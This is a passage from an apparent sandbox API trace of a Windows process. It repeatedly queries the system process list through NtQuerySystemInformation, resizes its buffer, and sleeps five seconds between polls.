ResultLength=0x0) returned 0x0 [0260.248] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.249] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.251] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.251] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.252] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.252] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.252] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.257] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.258] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.260] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.260] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.261] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.262] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.267] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.268] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.295] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.302] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.303] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.305] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.306] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.306] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.312] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.313] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.314] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.315] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.316] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.320] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.321] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.322] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.324] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.324] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.331] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.332] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.336] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.336] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.340] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.342] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.344] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.344] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.346] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.346] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.346] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.360] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.361] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.363] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.363] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.364] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.365] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.365] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.370] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.370] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.372] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.372] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.373] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.374] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.374] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.379] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.380] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.382] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.383] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.383] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.383] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.387] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.388] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.389] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.391] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.391] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.398] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.399] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.401] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.404] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.404] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.404] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.414] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.416] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.418] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.418] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.421] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.421] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.426] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.428] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.429] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.430] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.430] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.431] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.435] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.436] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.440] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.440] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.440] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.445] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.446] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.448] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.449] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.449] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.449] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.455] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.456] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.458] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.458] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.459] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.459] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.464] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.465] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.467] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.468] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.469] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.469] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.474] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.475] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.476] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.477] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.478] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.478] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.483] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.484] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.485] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.487] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.487] NtAllocateVirtualMemory (in: 